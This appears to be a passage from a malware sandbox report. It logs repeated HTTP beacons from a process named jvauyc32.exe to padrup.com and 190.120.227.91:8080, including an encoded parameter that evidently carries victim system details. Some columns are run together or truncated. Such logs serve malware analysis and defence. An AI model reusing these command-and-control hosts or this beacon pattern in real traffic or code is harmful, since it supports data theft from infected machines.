    Data Ascii: _wv=Y21kJjllMTQ2YmU5LWM3NmEtNDcyMC1iY2RiLTUzMDExYjg3YmQwNiZkR2x1WVNBNklGUkpUa0V0VUVNZ09pQTROemcwTVRFJTNEJldpbmRvd3MlMjAxMCUyMCg2NC1iaXQpJjEmV2luZG93cyUyMERlZmVuZGVyJjUuMSYxOC4xMC4yMDI0Jk5PTkU=
Oct 18, 2024 12:44:04.999181986 CEST | 606 | IN | HTTP/1.1 404 Not Found
    Date: Fri, 18 Oct 2024 10:43:59 GMT
    Server: Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.6.14
    X-Powered-By: PHP/5.6.14
    Status: 404 Not Found
    Content-Length: 377
    Content-Type: text/html; charset=utf8
    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /n/tasks.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>...-MTQwMTA3NjM4NjcxNTc2NiNyYXRlIDUj--->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.9 | 50032 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:01.925610065 CEST | 156 | OUT | GET /sobaka1.gif?25bc9cf1=633117937 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 12:44:03.034373999 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 10:44:02 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_MIMBmFRdG8aP4CneOFXARCUHYEtEAleqiZGS5SHLOObvvrUPDTe3WRToCRl6ZwHnfHQvVjHV7UouIKNheqRikQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Pcrew-Ip-Organization: QuadraNet
    X-Pcrew-Blocked-Reason: hosting network
    X-Domain: padrup.com
    X-Subdomain:
    Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:03.034399033 CEST | 1236 | IN | (continuation of response body)
    Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI0Mi42ODg3OjI0MzYwNjZhZGYyY2ZkNTFjMTcxODU2MWJhMjY2YmNkMDcyNzlkNjdlZmMxNTczZTUwN2ZlOTY0N2Y3NmMyMjg6NjcxMjNiZjJhODIyYg==';
Oct 18, 2024 12:44:03.034415960 CEST | 424 | IN | (continuation of response body)
    Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:44:03.034557104 CEST | 340 | IN | (continuation of response body)
    Data Ascii: 146673bb21');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.9 | 50033 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:03.473856926 CEST | 170 | OUT | GET /sobakavolos.gif?25d5c2b0=-486371296 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.9 | 50034 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:07.931842089 CEST | 156 | OUT | GET /sobaka1.gif?269bb762=239207342 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 12:44:09.073398113 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 10:44:08 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_WF+2luepB9K37YzWFjGbYBctJMCgtXTdTtaQSiG8dSIh4y4xGHm4pfYEl+R9zBWGlZZJMqGRFVDL8k8dbkj7AA==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.073458910 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI0OC43MTAxOjNiY2RlMDJjNzM0ZGFhODEwNGJjMGEwNWY1NzlkOGFhM2QzYzExMzNjNjc1YWJjNzdlMWQwNDBjZWM4MzNhNDA6NjcxMjNiZjhhZDVhNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.073498964 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.9 | 50035 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:09.345932007 CEST | 171 | OUT | GET /sobakavolos.gif?270a0145=-2040263502 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.9 | 50036 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:13.855514050 CEST | 157 | OUT | GET /sobaka1.gif?27c85804=-957761516 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:14.966861010 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ZyXj+mRScJ5uIq89i8ZPiyu6PQJwFSu+Tg6sWyFphcGg0SsyLBV28tGQOgijMYXWaGdkO3FwBzECe8PPJ+h5Gg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:14.967008114 CEST | 212 | IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI1NC42MTI6YjdlMDZlYjdjOTQyOGRjMjg3ZWQyNWFjYWJjZTc4YzgxYzRhNDk5Y2QyODI0Y2JiMGNkZTgyYzk5MzE
Oct 18, 2024 12:44:14.967020988 CEST | 1236 | IN
Data Ascii: 5YTQ3Njo2NzEyM2JmZTk1Njdl';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</sc
Oct 18, 2024 12:44:14.967031002 CEST | 548 | IN
Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bfe&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '1123f5c88f30eedf0e7d793f8af791029582f142a33');</script><scrip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.9 | 50037 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:15.369182110 CEST | 171 | OUT | GET /sobakavolos.gif?27fe3552=-1611082424 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.9 | 50038 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:19.940457106 CEST | 156 | OUT | GET /sobaka1.gif?28892810=465574000 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:20.972254992 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_nqFkTrQDZvYjtnrfUZoQQ8hwLloaHsfX9P9Qksww94r7ZXiygU5z8+LZrRiE8mUadu1wdSGP0zYPs/BHoVYyyQ==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:20.972274065 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI2MC42MzI2OmU1ZTBkZWExYTllOWIwMmZlODA2MDQ5NTM2MzM0ZGEwM2FjYWRlZWQ3NTczMTMzMWIwZDUxOTA3NWU0MTg1NWY6NjcxMjNjMDQ5YTcwMw==';
Oct 18, 2024 12:44:20.972285986 CEST | 424 | IN | Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:44:20.972296953 CEST | 336 | IN | Data Ascii: 142ada');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.9 | 50039 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:21.738194942 CEST | 170 | OUT | GET /sobakavolos.gif?28a2e80b=-204378046 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.9 | 50040 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:44:26.182900906 CEST | 156 | OUT | GET /sobaka1.gif?2924596e=690248046 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:27.259763956 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_aH1pfONJ8RGIHVsnY6q84Y016TSl/+qhN0CyhUgbh6SK/cgBAU24Cs4YRdxZvT4pCRlE9YnhIG1WZvWOJVO7Vg==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:27.259780884 CEST | 1236 | IN | Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI2Ni45MDI0OjgzODdjNDVmODg5ZmY3NGZmZmU4NmIzODBlZjc5OTQzZDczOGUxOGVhZjljYWEwNWE4NWI1ZmQ1Mjg2OWM0OWM6NjcxMjNjMGFkYzUwZQ==';
Oct 18, 2024 12:44:27.259799957 CEST | 764 | IN | Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
59          192.168.2.9  50041        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:44:27.893058062 CEST  170                OUT        GET /sobakavolos.gif?2945db31=1244584328 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
60          192.168.2.9  50042        185.53.178.50   80                800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:44:32.972449064 CEST  156                OUT        GET /sobaka1.gif?29d43e7c=701775484 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:44:34.003377914 CEST  1236               IN         HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:44:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_UDw9IwJvkd0L3CwebU9V1NehExUqbvoAx7VvQkKuyxUVJW/dphtGiee69tL8S7RQ24GG/Y7Sxc7XyHluPRTjJA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:34.003463030 CEST  1236               IN         Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI3My42NjM4OjYwMDkyN2FiZmRiYzBhNWI4Y2QwYzIyZDE3ZjZhMjQyMjA4YmZmYzE5MmQyZjFiYTM4MDJjNTExOWMxODk0Njk6NjcxMjNjMTFhMjBlNA==';
Oct 18, 2024 12:44:34.003475904 CEST  764                IN         Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
61          192.168.2.9  50043        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:44:34.275511980 CEST  171                OUT        GET /sobakavolos.gif?29f3e9f8=-1479563296 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          62192.168.2.950044185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.174968958 CEST156OUTGET /sobaka1.gif?2a6f2852=688527934 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:40.244339943 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:40 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_tF7/acnrmDT6dnSp8yHA9IkwdQ16MbdObvIKMk5stfOQgvZpzBfCr10S+P/ii3uAUkQNqKTKK85B6cPdRyO4eg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Ascii: 1eb<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:44:40.244394064 CEST | 1236 | IN
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI3OS44Nzg0OmI0ZTgwMWM4MGFhZjJjMjE1OWI4YjVkNmJlODE3MTFlNWZhZDZkM2YyMmI3ZjM5MjhjM2JmNjJkNTQ6ee5NWNjYzM6NjcxMjNjMTdkNjc
Oct 18, 2024 12:44:40.244427919 CEST | 424 | IN
